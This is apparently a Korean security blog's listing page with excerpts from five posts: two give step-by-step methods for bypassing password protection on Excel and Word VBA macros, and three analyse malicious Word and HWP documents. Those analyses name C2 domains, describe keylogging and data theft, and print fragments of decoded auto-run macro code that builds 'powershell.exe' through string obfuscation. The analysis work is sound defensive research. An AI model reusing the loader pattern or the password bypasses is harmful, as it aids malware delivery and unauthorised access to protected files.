728x90 반응형 악성코드5 엑셀, 워드 매크로 비밀번호 풀기(VBA 암호풀기) 암호묻는 다이어로그 창의 리턴값을 1로 고정시켜서 암호를 맞게 입력한것으로 속이는 방법이다. Excel 2007 Excel 2010 Excel 2013 Excel 2016 1. 락이걸린 엑셀파일을 연다. 2. 새 xlsm 파일을 생성한다. 3. Alt+F11 을 눌러 VBA를 실행한후 새로 만든 파일의 프로젝트를 선택하고 위의 메뉴의 Insert->Module 해서 Module1 에 다음 코드를 복사해 넣는다 64bit 엑셀프로그램은 아래의 64bit 버전용 코드를 대신 삽입니다. Excel 32bit 버전용 코드 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39.. 2022. 11. 15. 매크로에 비밀번호가 있는 경우 매크로 추출하는 방법(VBA 추출) 아래 그림과 같이 문서에서 매크로를 실행하면 비밀번호가 걸려있어 매크로 내용이 확인되지 않는다. 1. 문서명.doc > 문서명.zip 으로 압축파일로 확장자 변경한다. 2. zip 압축파일 열기 vbaProject.bin 을 압축파일에서 꺼낸다. 3. Hex 에디터 실행, 문자열 DPB 검색 4. DPB 문자열을 DPx로 변경 후 저장 5. 2.의 zip 파일의 원본 vbaProject.bin을 DPx로 변경한 vbaProject.bin 파일로 변경 6. 문서.zip파일을 다시 문서.doc로 변경 7. 문서 열면 오류발생 YES 눌러줌 8. Alt+F11 누르고 Project 오른쪽마우스클릭 > 속성 > 비밀번호를 쉽게 변경 후 문서저장 후 닫기 9. 다시 문서 실행, Alt+F11 하면 매크로가 살아있음 2022. 10. 15. 악성코드가 포함된 워드문서(doc) 분석 2 [분석 요약표] 연번 C2서버 도메인 다운로드 파일1 악성 행위 다운로드 파일2 악성 행위 1 uyfhk.mypressonline.com li.txt 감염 시스템 정보를 C2서버로 전송 li.down 사용자가 키보드로 입력한 값을 Ahanlab.hwp 파일에 저장 2 3 nskal.myarts online.com op.txt op.down xsiel.mypressonline.com에서 추가 악성파일 settings.dat을 다운로드하여 실행 ○ 문서의 매크로 내용을 확인한 결과, 난독화된 소스코드가 확인되며 문서 2개 모두 동일한 매크로가 확인된다. 디코딩하면 아래와 같다. Private Sub Document_Open() Set djfeihfidkasljf = CreateObject("Shell.App.. 2022. 10. 7. 악성코드가 포함된 워드문서(doc) 분석 ○ 워드 문서를 열람하면 매크로 기능이 포함되어 있는 문서로 확인된다. ○ 매크로 내용을 확인한 결과, 난독화된 소스코드가 확인되며 디코딩하면 아래 표와 같다. Public Sub Document_Open() Set a = CreateObject("Shell.Application") Dim d f = "vnslajdsladkf" f = Left(f, 5) #vnsla 문자열 추출 d = "pvnslavnslaowvnslavnslavnslaersvnslahelvnslavnslal.evnslaxvnslae" d = Replace(d, f, "") # d 변수 문자열에서 “vnsla”을 공백으로 변경 # d = "powershell.exe" h = "[vnslastvnslarivnslanvnslag]$vnsl.. 2022. 10. 3. lnk 악성코드가 포함된 한글 (hwp) 문서파일 분석 ○ 한글문서를 실행하면 아래 그림과 같은 그림파일의 포스터 4장이 존재한다. 포스터 뒤에는 실행링크(1.lnk, 2.lnk, 3.lnk)가 포함되어 있는 것이 확인된다. ○ 사용자가 문서 내 그림을 클릭하면 링크파일이 실행되며 아래 그림과 같이 ‘bongpenn1.myartsonline.com’ C2서버와 통신하는 것이 확인된다. ‘1.exe’를 이용하여 C2서버의 ‘h.php’ 소스코드를 실행하며 ‘h.php’ 소스코드를 확인한 결과, 작업스케줄러에 'update.ini', 'OndDrive.exe' 파일이 30분마다 자동실행되도록 등록하고 최근 실행파일, 작업스케줄러 목록, 프로그램 목록 등을 C2서버로 전송하는 소스코드를 확인하였다. 한글문서 내에서 악성행위를 하는 OLE 개체를 확인한 결과, 아래.. 2022. 10. 2. 이전 1 다음 728x90 반응형
